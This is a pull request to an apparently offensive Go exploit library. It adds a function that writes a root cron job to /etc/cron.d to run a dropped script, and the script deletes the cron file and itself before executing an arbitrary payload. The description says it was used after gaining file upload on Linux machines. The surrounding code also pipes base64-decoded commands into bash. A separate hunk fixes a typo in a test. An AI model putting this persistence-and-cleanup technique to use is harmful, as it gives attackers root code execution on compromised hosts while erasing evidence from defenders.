### PR TITLE
Added a self-removing cron payload wrapper

### DIFF
--- a/payload/encode.go
+++ b/payload/encode.go
@@ -22,3 +22,22 @@ func EncodeEchoBase64ToBash(cmd string) string {
 
 	return fmt.Sprintf("echo %s|base64 -d|bash", cmd64)
 }
+
+// Creates two files that can be used for gaining execution via "/etc/cron.d". The first return ("cron")
+// should be uploaded to "cronPath" (presumably /etc/cron.d but I don't know your life), and the second
+// return should be uploaded to "xploitPath" (e.g. /tmp/helloworld). The cron file will trigger
+// execution of the bash script which will delete both the cron and itself. Example usage:
+//
+//	cronPath := fmt.Sprintf("/etc/cron.d/%s", random.RandLetters(8))
+//	xploitPath := fmt.Sprintf("/tmp/%s", random.RandLetters(8))
+//	xploit, ok := generatePayload(conf)
+//	if !ok {
+//	    return false
+//	}
+//	cron, xploit := selfRemovableCron("root", cronPath, xploitPath, xploit)
+func SelfRemovingCron(user string, cronPath string, xploitPath string, payload string) (string, string) {
+	cron := fmt.Sprintf(`* * * * * %s /bin/sh %s\n`, user, xploitPath)
+	xploit := fmt.Sprintf("#!/bin/sh\n\nrm -f %s\nrm -f %s\n%s\n", cronPath, xploitPath, payload)
+
+	return cron, xploit
+}

--- a/protocol/rocketmq/remoting_test.go
+++ b/protocol/rocketmq/remoting_test.go
@@ -9,12 +9,12 @@ func Test_MaxSize(t *testing.T) {
 	msg := strings.Repeat("A", 2^24+1)
 	mqMsg := CreateMqRemotingMessage(msg, 112, 1)
 	if mqMsg != nil {
-		t.Error("msg size should have exceeded artifical cap")
+		t.Error("msg size should have exceeded artificial cap")
 	}
 
 	msg = strings.Repeat("A", 2^24)
 	mqMsg = CreateMqRemotingMessage(msg, 112, 1)
 	if mqMsg == nil {
-		t.Error("msg size should not have exceeded the artifical cap")
+		t.Error("msg size should not have exceeded the artificial cap")
 	}
 }


### PR DESCRIPTION
Recently had a file upload primitive against Linux machines. Used this self-removing cron for execution.

It creates two strings that can be used for gaining execution via "/etc/cron.d". The first return ("cron") should be uploaded to "cronPath" (presumably /etc/cron.d but I don't know your life), and the second return should be uploaded to "xploitPath" (e.g. /tmp/helloworld). The cron file will trigger execution of the bash script which will delete both the cron and itself. Example usage:

```go
cronPath := fmt.Sprintf("/etc/cron.d/%s", random.RandLetters(8))
xploitPath := fmt.Sprintf("/tmp/%s", random.RandLetters(8))
xploit, ok := generatePayload(conf)
if !ok {
    return false
}
cron, xploit := selfRemovableCron("root", cronPath, xploitPath, xploit)
```